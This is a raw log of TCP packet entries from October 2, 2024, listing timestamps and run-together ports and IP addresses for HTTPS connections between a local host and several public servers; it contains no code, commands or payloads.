                                                                                  Oct 2, 2024 17:49:38.022411108 CEST44349747192.0.78.27192.168.2.4
                                                                                  Oct 2, 2024 17:49:38.022962093 CEST49747443192.168.2.4192.0.78.27
                                                                                  Oct 2, 2024 17:49:38.022974014 CEST44349747192.0.78.27192.168.2.4
                                                                                  Oct 2, 2024 17:49:38.073618889 CEST49747443192.168.2.4192.0.78.27
                                                                                  Oct 2, 2024 17:49:38.158898115 CEST44349747192.0.78.27192.168.2.4
                                                                                  Oct 2, 2024 17:49:38.158974886 CEST44349747192.0.78.27192.168.2.4
                                                                                  Oct 2, 2024 17:49:38.159039974 CEST49747443192.168.2.4192.0.78.27
                                                                                  Oct 2, 2024 17:49:38.239567995 CEST49747443192.168.2.4192.0.78.27
                                                                                  Oct 2, 2024 17:49:38.239597082 CEST44349747192.0.78.27192.168.2.4
                                                                                  Oct 2, 2024 17:49:38.562726021 CEST49749443192.168.2.4142.250.184.196
                                                                                  Oct 2, 2024 17:49:38.562779903 CEST44349749142.250.184.196192.168.2.4
                                                                                  Oct 2, 2024 17:49:38.563260078 CEST49749443192.168.2.4142.250.184.196
                                                                                  Oct 2, 2024 17:49:38.563750982 CEST49749443192.168.2.4142.250.184.196
                                                                                  Oct 2, 2024 17:49:38.563766003 CEST44349749142.250.184.196192.168.2.4
                                                                                  Oct 2, 2024 17:49:38.818670034 CEST49750443192.168.2.4172.67.214.183
                                                                                  Oct 2, 2024 17:49:38.818711042 CEST44349750172.67.214.183192.168.2.4
                                                                                  Oct 2, 2024 17:49:38.818775892 CEST49750443192.168.2.4172.67.214.183
                                                                                  Oct 2, 2024 17:49:38.819099903 CEST49750443192.168.2.4172.67.214.183
                                                                                  Oct 2, 2024 17:49:38.819113016 CEST44349750172.67.214.183192.168.2.4
                                                                                  Oct 2, 2024 17:49:39.205463886 CEST44349749142.250.184.196192.168.2.4
                                                                                  Oct 2, 2024 17:49:39.205837011 CEST49749443192.168.2.4142.250.184.196
                                                                                  Oct 2, 2024 17:49:39.205853939 CEST44349749142.250.184.196192.168.2.4
                                                                                  Oct 2, 2024 17:49:39.207268953 CEST44349749142.250.184.196192.168.2.4
                                                                                  Oct 2, 2024 17:49:39.207354069 CEST49749443192.168.2.4142.250.184.196
                                                                                  Oct 2, 2024 17:49:39.209964037 CEST49749443192.168.2.4142.250.184.196
                                                                                  Oct 2, 2024 17:49:39.210040092 CEST44349749142.250.184.196192.168.2.4
                                                                                  Oct 2, 2024 17:49:39.278242111 CEST44349750172.67.214.183192.168.2.4
                                                                                  Oct 2, 2024 17:49:39.307563066 CEST49750443192.168.2.4172.67.214.183
                                                                                  Oct 2, 2024 17:49:39.307630062 CEST44349750172.67.214.183192.168.2.4
                                                                                  Oct 2, 2024 17:49:39.308684111 CEST44349750172.67.214.183192.168.2.4
                                                                                  Oct 2, 2024 17:49:39.308765888 CEST49750443192.168.2.4172.67.214.183
                                                                                  Oct 2, 2024 17:49:39.331540108 CEST49750443192.168.2.4172.67.214.183
                                                                                  Oct 2, 2024 17:49:39.331724882 CEST49750443192.168.2.4172.67.214.183
                                                                                  Oct 2, 2024 17:49:39.331887960 CEST44349750172.67.214.183192.168.2.4
                                                                                  Oct 2, 2024 17:49:39.331940889 CEST49750443192.168.2.4172.67.214.183
                                                                                  Oct 2, 2024 17:49:39.332003117 CEST49750443192.168.2.4172.67.214.183
                                                                                  Oct 2, 2024 17:49:39.332463026 CEST49751443192.168.2.4172.67.214.183
                                                                                  Oct 2, 2024 17:49:39.332500935 CEST44349751172.67.214.183192.168.2.4
                                                                                  Oct 2, 2024 17:49:39.332566023 CEST49751443192.168.2.4172.67.214.183
                                                                                  Oct 2, 2024 17:49:39.333137989 CEST49751443192.168.2.4172.67.214.183
                                                                                  Oct 2, 2024 17:49:39.333152056 CEST44349751172.67.214.183192.168.2.4
                                                                                  Oct 2, 2024 17:49:39.415441036 CEST44349749142.250.184.196192.168.2.4
                                                                                  Oct 2, 2024 17:49:39.415534019 CEST49749443192.168.2.4142.250.184.196
                                                                                  Oct 2, 2024 17:49:39.796633959 CEST44349751172.67.214.183192.168.2.4
                                                                                  Oct 2, 2024 17:49:39.869724989 CEST49751443192.168.2.4172.67.214.183
                                                                                  Oct 2, 2024 17:49:39.869762897 CEST44349751172.67.214.183192.168.2.4
                                                                                  Oct 2, 2024 17:49:39.871298075 CEST44349751172.67.214.183192.168.2.4
                                                                                  Oct 2, 2024 17:49:39.871310949 CEST44349751172.67.214.183192.168.2.4
                                                                                  Oct 2, 2024 17:49:39.871376038 CEST49751443192.168.2.4172.67.214.183
                                                                                  Oct 2, 2024 17:49:39.923113108 CEST49751443192.168.2.4172.67.214.183
                                                                                  Oct 2, 2024 17:49:39.923419952 CEST44349751172.67.214.183192.168.2.4
                                                                                  Oct 2, 2024 17:49:39.923934937 CEST49751443192.168.2.4172.67.214.183
                                                                                  Oct 2, 2024 17:49:39.923954964 CEST44349751172.67.214.183192.168.2.4
                                                                                  Oct 2, 2024 17:49:40.135757923 CEST49751443192.168.2.4172.67.214.183
                                                                                  Oct 2, 2024 17:49:40.570019960 CEST49753443192.168.2.4184.28.90.27
                                                                                  Oct 2, 2024 17:49:40.570055008 CEST44349753184.28.90.27192.168.2.4
                                                                                  Oct 2, 2024 17:49:40.570102930 CEST49753443192.168.2.4184.28.90.27
                                                                                  Oct 2, 2024 17:49:40.571826935 CEST49753443192.168.2.4184.28.90.27
                                                                                  Oct 2, 2024 17:49:40.571846008 CEST44349753184.28.90.27192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.231167078 CEST44349753184.28.90.27192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.231240034 CEST49753443192.168.2.4184.28.90.27
                                                                                  Oct 2, 2024 17:49:41.303404093 CEST49753443192.168.2.4184.28.90.27
                                                                                  Oct 2, 2024 17:49:41.303421974 CEST44349753184.28.90.27192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.303795099 CEST44349753184.28.90.27192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.402287006 CEST49753443192.168.2.4184.28.90.27
                                                                                  Oct 2, 2024 17:49:41.451364040 CEST44349751172.67.214.183192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.454248905 CEST44349751172.67.214.183192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.454277039 CEST44349751172.67.214.183192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.454298973 CEST44349751172.67.214.183192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.454299927 CEST49751443192.168.2.4172.67.214.183
                                                                                  Oct 2, 2024 17:49:41.454330921 CEST44349751172.67.214.183192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.454344034 CEST49751443192.168.2.4172.67.214.183
                                                                                  Oct 2, 2024 17:49:41.454395056 CEST44349751172.67.214.183192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.454431057 CEST49751443192.168.2.4172.67.214.183
                                                                                  Oct 2, 2024 17:49:41.454437017 CEST44349751172.67.214.183192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.459119081 CEST44349751172.67.214.183192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.459146976 CEST44349751172.67.214.183192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.459191084 CEST49751443192.168.2.4172.67.214.183
                                                                                  Oct 2, 2024 17:49:41.459203959 CEST44349751172.67.214.183192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.459331989 CEST49751443192.168.2.4172.67.214.183
                                                                                  Oct 2, 2024 17:49:41.459778070 CEST44349751172.67.214.183192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.536777973 CEST49753443192.168.2.4184.28.90.27
                                                                                  Oct 2, 2024 17:49:41.537980080 CEST44349751172.67.214.183192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.538022041 CEST44349751172.67.214.183192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.538033962 CEST49751443192.168.2.4172.67.214.183
                                                                                  Oct 2, 2024 17:49:41.538045883 CEST44349751172.67.214.183192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.538077116 CEST44349751172.67.214.183192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.538115978 CEST49751443192.168.2.4172.67.214.183
                                                                                  Oct 2, 2024 17:49:41.538126945 CEST44349751172.67.214.183192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.538162947 CEST44349751172.67.214.183192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.538203001 CEST49751443192.168.2.4172.67.214.183
                                                                                  Oct 2, 2024 17:49:41.578046083 CEST49751443192.168.2.4172.67.214.183
                                                                                  Oct 2, 2024 17:49:41.578063011 CEST44349751172.67.214.183192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.583399057 CEST44349753184.28.90.27192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.593683004 CEST49756443192.168.2.4104.18.95.41
                                                                                  Oct 2, 2024 17:49:41.593703032 CEST44349756104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.593866110 CEST49756443192.168.2.4104.18.95.41
                                                                                  Oct 2, 2024 17:49:41.594233036 CEST49757443192.168.2.4151.101.2.137
                                                                                  Oct 2, 2024 17:49:41.594261885 CEST44349757151.101.2.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.594314098 CEST49757443192.168.2.4151.101.2.137
                                                                                  Oct 2, 2024 17:49:41.594909906 CEST49756443192.168.2.4104.18.95.41
                                                                                  Oct 2, 2024 17:49:41.594922066 CEST44349756104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.595113993 CEST49757443192.168.2.4151.101.2.137
                                                                                  Oct 2, 2024 17:49:41.595129013 CEST44349757151.101.2.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.595398903 CEST49758443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:41.595426083 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.595513105 CEST49758443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:41.595911026 CEST49758443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:41.595931053 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.931375980 CEST44349753184.28.90.27192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.931493998 CEST44349753184.28.90.27192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.931710005 CEST49753443192.168.2.4184.28.90.27
                                                                                  Oct 2, 2024 17:49:41.931710005 CEST49753443192.168.2.4184.28.90.27
                                                                                  Oct 2, 2024 17:49:41.931710958 CEST49753443192.168.2.4184.28.90.27
                                                                                  Oct 2, 2024 17:49:41.931752920 CEST44349753184.28.90.27192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.999665022 CEST49759443192.168.2.4184.28.90.27
                                                                                  Oct 2, 2024 17:49:41.999716043 CEST44349759184.28.90.27192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.999782085 CEST49759443192.168.2.4184.28.90.27
                                                                                  Oct 2, 2024 17:49:42.000060081 CEST49759443192.168.2.4184.28.90.27
                                                                                  Oct 2, 2024 17:49:42.000072956 CEST44349759184.28.90.27192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.053855896 CEST44349757151.101.2.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.054313898 CEST49757443192.168.2.4151.101.2.137
                                                                                  Oct 2, 2024 17:49:42.054328918 CEST44349757151.101.2.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.055417061 CEST44349757151.101.2.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.055483103 CEST49757443192.168.2.4151.101.2.137
                                                                                  Oct 2, 2024 17:49:42.072345018 CEST44349756104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.072607994 CEST49756443192.168.2.4104.18.95.41
                                                                                  Oct 2, 2024 17:49:42.072618008 CEST44349756104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.073685884 CEST44349756104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.073744059 CEST49756443192.168.2.4104.18.95.41
                                                                                  Oct 2, 2024 17:49:42.077339888 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.077555895 CEST49758443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:42.077573061 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.078526974 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.078596115 CEST49758443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:42.079266071 CEST49758443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:42.079266071 CEST49758443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:42.079279900 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.079329014 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.224514008 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.224549055 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.224577904 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.224605083 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.224637985 CEST49758443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:42.224647045 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.224678993 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.224845886 CEST49758443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:42.225039005 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.225244045 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.225364923 CEST49758443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:42.225374937 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.229245901 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.229343891 CEST49758443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:42.229351997 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.292409897 CEST49753443192.168.2.4184.28.90.27
                                                                                  Oct 2, 2024 17:49:42.292454004 CEST44349753184.28.90.27192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.292467117 CEST49758443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:42.316663027 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.316734076 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.316761971 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.316895962 CEST49758443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:42.316910982 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.317008972 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.317033052 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.317076921 CEST49758443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:42.317085028 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.317351103 CEST49758443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:42.317718029 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.317744017 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.317816973 CEST49758443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:42.317825079 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.317941904 CEST49758443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:42.318121910 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.318180084 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.318219900 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.318247080 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.318273067 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.318306923 CEST49758443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:42.318306923 CEST49758443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:42.318315983 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.318373919 CEST49758443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:42.319166899 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.319226027 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.319250107 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.319277048 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.319289923 CEST49758443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:42.319298029 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.319425106 CEST49758443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:42.320034027 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.320148945 CEST49758443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:42.320156097 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.320411921 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.320466042 CEST49758443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:42.320483923 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.320502043 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.320581913 CEST49758443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:42.320754051 CEST49758443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:42.320776939 CEST44349758104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.411712885 CEST49757443192.168.2.4151.101.2.137
                                                                                  Oct 2, 2024 17:49:42.411904097 CEST44349757151.101.2.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.412074089 CEST49757443192.168.2.4151.101.2.137
                                                                                  Oct 2, 2024 17:49:42.412090063 CEST44349757151.101.2.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.416208982 CEST49756443192.168.2.4104.18.95.41
                                                                                  Oct 2, 2024 17:49:42.416426897 CEST49756443192.168.2.4104.18.95.41
                                                                                  Oct 2, 2024 17:49:42.416425943 CEST44349756104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.459403992 CEST44349756104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.521435976 CEST44349757151.101.2.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.521454096 CEST44349757151.101.2.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.521521091 CEST49757443192.168.2.4151.101.2.137
                                                                                  Oct 2, 2024 17:49:42.521544933 CEST44349757151.101.2.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.521555901 CEST44349757151.101.2.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.521581888 CEST44349757151.101.2.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.521600008 CEST49757443192.168.2.4151.101.2.137
                                                                                  Oct 2, 2024 17:49:42.521627903 CEST49757443192.168.2.4151.101.2.137
                                                                                  Oct 2, 2024 17:49:42.524000883 CEST44349756104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.524065018 CEST49756443192.168.2.4104.18.95.41
                                                                                  Oct 2, 2024 17:49:42.527880907 CEST49756443192.168.2.4104.18.95.41
                                                                                  Oct 2, 2024 17:49:42.527900934 CEST44349756104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.531156063 CEST49760443192.168.2.4104.18.95.41
                                                                                  Oct 2, 2024 17:49:42.531182051 CEST44349760104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.531250954 CEST49760443192.168.2.4104.18.95.41
                                                                                  Oct 2, 2024 17:49:42.531451941 CEST49760443192.168.2.4104.18.95.41
                                                                                  Oct 2, 2024 17:49:42.531464100 CEST44349760104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.594249964 CEST44349757151.101.2.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.594265938 CEST44349757151.101.2.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.594306946 CEST44349757151.101.2.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.594321966 CEST44349757151.101.2.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.594327927 CEST49757443192.168.2.4151.101.2.137
                                                                                  Oct 2, 2024 17:49:42.594341040 CEST44349757151.101.2.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.594386101 CEST49757443192.168.2.4151.101.2.137
                                                                                  Oct 2, 2024 17:49:42.595966101 CEST44349757151.101.2.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.595978975 CEST44349757151.101.2.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.596002102 CEST44349757151.101.2.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.596034050 CEST49757443192.168.2.4151.101.2.137
                                                                                  Oct 2, 2024 17:49:42.596040010 CEST44349757151.101.2.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.596091032 CEST49757443192.168.2.4151.101.2.137
                                                                                  Oct 2, 2024 17:49:42.636311054 CEST44349759184.28.90.27192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.636393070 CEST49759443192.168.2.4184.28.90.27
                                                                                  Oct 2, 2024 17:49:42.668550968 CEST49759443192.168.2.4184.28.90.27
                                                                                  Oct 2, 2024 17:49:42.668581963 CEST44349759184.28.90.27192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.669337988 CEST44349759184.28.90.27192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.670552969 CEST49759443192.168.2.4184.28.90.27
                                                                                  Oct 2, 2024 17:49:42.683450937 CEST44349757151.101.2.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.683480978 CEST44349757151.101.2.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.683530092 CEST49757443192.168.2.4151.101.2.137
                                                                                  Oct 2, 2024 17:49:42.683543921 CEST44349757151.101.2.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.683588982 CEST49757443192.168.2.4151.101.2.137
                                                                                  Oct 2, 2024 17:49:42.683799028 CEST44349757151.101.2.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.683814049 CEST44349757151.101.2.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.683842897 CEST44349757151.101.2.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.683859110 CEST49757443192.168.2.4151.101.2.137
                                                                                  Oct 2, 2024 17:49:42.683864117 CEST44349757151.101.2.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.683907032 CEST49757443192.168.2.4151.101.2.137
                                                                                  Oct 2, 2024 17:49:42.683908939 CEST44349757151.101.2.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.683945894 CEST49757443192.168.2.4151.101.2.137
                                                                                  Oct 2, 2024 17:49:42.685214996 CEST49757443192.168.2.4151.101.2.137
                                                                                  Oct 2, 2024 17:49:42.685229063 CEST44349757151.101.2.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.714812040 CEST49761443192.168.2.4151.101.130.137
                                                                                  Oct 2, 2024 17:49:42.714834929 CEST44349761151.101.130.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.714890957 CEST49761443192.168.2.4151.101.130.137
                                                                                  Oct 2, 2024 17:49:42.715162039 CEST49761443192.168.2.4151.101.130.137
                                                                                  Oct 2, 2024 17:49:42.715173006 CEST44349761151.101.130.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.715401888 CEST44349759184.28.90.27192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.911837101 CEST44349759184.28.90.27192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.912003994 CEST44349759184.28.90.27192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.912076950 CEST49759443192.168.2.4184.28.90.27
                                                                                  Oct 2, 2024 17:49:42.994127989 CEST44349760104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.000432014 CEST49760443192.168.2.4104.18.95.41
                                                                                  Oct 2, 2024 17:49:43.000458956 CEST44349760104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.000813961 CEST44349760104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.001260996 CEST49760443192.168.2.4104.18.95.41
                                                                                  Oct 2, 2024 17:49:43.001328945 CEST44349760104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.001449108 CEST49760443192.168.2.4104.18.95.41
                                                                                  Oct 2, 2024 17:49:43.002774954 CEST49759443192.168.2.4184.28.90.27
                                                                                  Oct 2, 2024 17:49:43.002821922 CEST44349759184.28.90.27192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.002840042 CEST49759443192.168.2.4184.28.90.27
                                                                                  Oct 2, 2024 17:49:43.002847910 CEST44349759184.28.90.27192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.043394089 CEST44349760104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.124854088 CEST44349760104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.124881983 CEST44349760104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.124908924 CEST44349760104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.124944925 CEST49760443192.168.2.4104.18.95.41
                                                                                  Oct 2, 2024 17:49:43.124948025 CEST44349760104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.124964952 CEST44349760104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.124989986 CEST44349760104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.125008106 CEST49760443192.168.2.4104.18.95.41
                                                                                  Oct 2, 2024 17:49:43.125008106 CEST49760443192.168.2.4104.18.95.41
                                                                                  Oct 2, 2024 17:49:43.125649929 CEST44349760104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.125695944 CEST49760443192.168.2.4104.18.95.41
                                                                                  Oct 2, 2024 17:49:43.125700951 CEST44349760104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.129815102 CEST44349760104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.129848003 CEST44349760104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.129870892 CEST49760443192.168.2.4104.18.95.41
                                                                                  Oct 2, 2024 17:49:43.129875898 CEST44349760104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.129923105 CEST49760443192.168.2.4104.18.95.41
                                                                                  Oct 2, 2024 17:49:43.200093985 CEST44349761151.101.130.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.202029943 CEST49761443192.168.2.4151.101.130.137
                                                                                  Oct 2, 2024 17:49:43.202065945 CEST44349761151.101.130.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.203035116 CEST44349761151.101.130.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.203092098 CEST49761443192.168.2.4151.101.130.137
                                                                                  Oct 2, 2024 17:49:43.203995943 CEST49761443192.168.2.4151.101.130.137
                                                                                  Oct 2, 2024 17:49:43.204060078 CEST44349761151.101.130.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.204236984 CEST49761443192.168.2.4151.101.130.137
                                                                                  Oct 2, 2024 17:49:43.204246998 CEST44349761151.101.130.137192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.213363886 CEST44349760104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.213435888 CEST44349760104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.213464022 CEST44349760104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.213494062 CEST44349760104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.213531971 CEST44349760104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.213561058 CEST49760443192.168.2.4104.18.95.41
                                                                                  Oct 2, 2024 17:49:43.213576078 CEST44349760104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.213603020 CEST44349760104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.213619947 CEST49760443192.168.2.4104.18.95.41
                                                                                  Oct 2, 2024 17:49:43.213624954 CEST44349760104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.213646889 CEST49760443192.168.2.4104.18.95.41
                                                                                  Oct 2, 2024 17:49:43.214401007 CEST44349760104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.214437962 CEST44349760104.18.95.41192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.214443922 CEST49760443192.168.2.4104.18.95.41
                                                                                  Oct 2, 2024 17:49:43.214448929 CEST44349760104.18.95.41192.168.2.4
